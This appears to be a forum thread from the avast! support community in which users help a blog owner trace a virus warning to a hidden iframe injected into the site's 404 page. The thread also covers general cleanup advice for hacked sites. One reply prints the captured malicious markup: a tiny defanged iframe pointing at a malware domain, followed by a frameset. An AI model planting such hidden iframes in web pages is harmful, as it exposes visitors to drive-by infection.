Is avast faulty here?

My blog developed a problem and I deleted it. However, I lost connection and part of the blog was left up. After a while I found out someone had hacked in with iframe:inf. I completely removed the folder on my website, deleted the DB and all users connected to it. Basically it is gone.
I use IE8 and have completely cleaned out my cache.
Yet when I go to the blog I get a virus warning, on another pc I get 404 not found???

What should I check for this error message…as it definitely isn’t the site.

You should’ve been using Opera browser, it’s the most secure browser.

The only browser worse than IE is Firefox.

Oh no! Firefox fanboys will gang up on me. ::slight_smile:

Firefox fanboys are as bad as Comodo fanboys! :frowning: Maybe worse! :frowning:

And exactly what does the browser you use have to do with a site having been hacked, answer nothing.

If you think what you post will provoke a flame war then don’t post it, especially when it isn’t relevant to the problem.

@ DaveBenn

  • This is commonly down to old content management software being vulnerable, PHP, Joomla, Wordpress, SQL, etc. etc. see this example of a HOSTs response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or
    “default.cfm” pages as those are popular targets too.

  2. Remove any “rogue” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
    changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load re-directs into them.

  4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
    “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

What is the URL of the blog ?
When you post it, ‘modify’ the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.

David

trueparenting dot co.uk/Blog uppercase B

Other pc in my house gets a 404. If you get a warning, then maybe it is an actual server error and not a problem on my machine as you have Avast and my other pc doesn’t.

Back when avast! forums was infected with an iframe Opera was displaying a little larger font in avast! forums.

I didn’t know what was wrong so I didn’t log in. If I remember right, someone did login to avast! forums and it

was a disaster for them. I’m glad Opera displayed the larger font, the larger font wasn’t intentional by Opera,

just a reaction to the infection.

Did you notice anything suspicious before you logged in to your blog?

Hello DaveBenn ,

According to this there is an external reference on your site to this site : squidoo.com and google safe browsing says, so there is a malicious script on that site.

Try removing it temporarily and check with avast again.

nmb

All references to squidoo now gone…no difference to the message.
ps. I get the same virus warning in Mozilla firefox.

I guess it’s too late now, but if you do start a new blog here is a good idea from Bob: http://forum.avast.com/index.php?topic=19387.msg483281#msg483281

Can you post a picture of the alert, please.

Got it!. I was checking the main site and not the blog.

There is an iframe : hxxp://ncenterpanel.cn/ on your blog and not on the root page. remove it.

That should do.

nmb

Thanks for spotting that, but WHERE is it? the entire folder is deleted from the server, the db is deleted and no users left. So where is that Iframe to be deleted from?

Here is the html page i get on my software which i use to get the source of the site:

I have just copied and pasted the source directly from the software, so you might see some white spaces.

And avast! might trigger on this page too. since it contains a iframe link.

<iframe src="hxxp://ncenterpanel.cn/" width="3" height="2"></iframe>













<html>
<head>
<title>Something of interest...</title>
</head>
<frameset rows=*>
<frame src="http://multinetti.lisasim737.hop.clickbank.net">
</frameset>
</html>
<!-- 
                                                                                                                                                                                                                                                                                                                                                                                                                                          
--> 

Superb!! Fixed it. Some low crawling scumbag has hacked my website and obviously left one of those in the standard 404 page. They also screwed all the index pages which I am working through now.

Thanks again…very helpful.

You are welcome to the forums.

But, please consider this post from Sir DavidR. They will help you from not getting infected again. Also the stopbadware link.

nmb

No alert in firefox 3.6.2, so presumably this posts was before clearing out the critter, I just get the standard HTTP 404 error and not any custom 404 page, which is regularly hacked also.

It is always better to use an image when pointing out code, even if you have edited the http, as the whole page is scanned in text mode by the web shield (the network shield may also be hunting out domain names in its list) and it could well alert on inserted samples, see image.

So, what is this software that lifts the source code? I have JS:Illredir-AK splattered all over my server, so would like to see if I can find it without having to check every single page.
I have one major problem with a site that is 95% PHP so will take decades to check every file.

Thanks for the suggestion sir DavidR. I will surely do that next time. You had once, previously, warned me regarding this. Will surely take care of it next time.

@ DaveBenn

Well the software, which I use, cant help much in cleaning up stuff on your site. I guess, there are others. I will ask one of my forum friends helping you in this regard. So kindly wait.

Thanks
nmb

Hi murali * DaveBenn,

The main culprit to look for is described fully here: http://www.whitefirdesign.com/resources/port-8080-malware.html

There is this script there and this has/had a suspicious history:
hxtp://s9.addthis.com/js/widget.php?v=10
Last time suspicious behavior was found there was on 2010-03-06.

This site was hosted on 23 network(s) including AS20940 (AKAMAI), AS1299 (TELIANET), AS7843 (ADELPHIA). Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 4 domains, including recipeeworld.com/, mapsofworld.com/, mensherbalpills.com/. Comments for these sites: "People, you should go on that site, they want people to see it and then catch a virus", that is clear as it is, isn't it?

polonus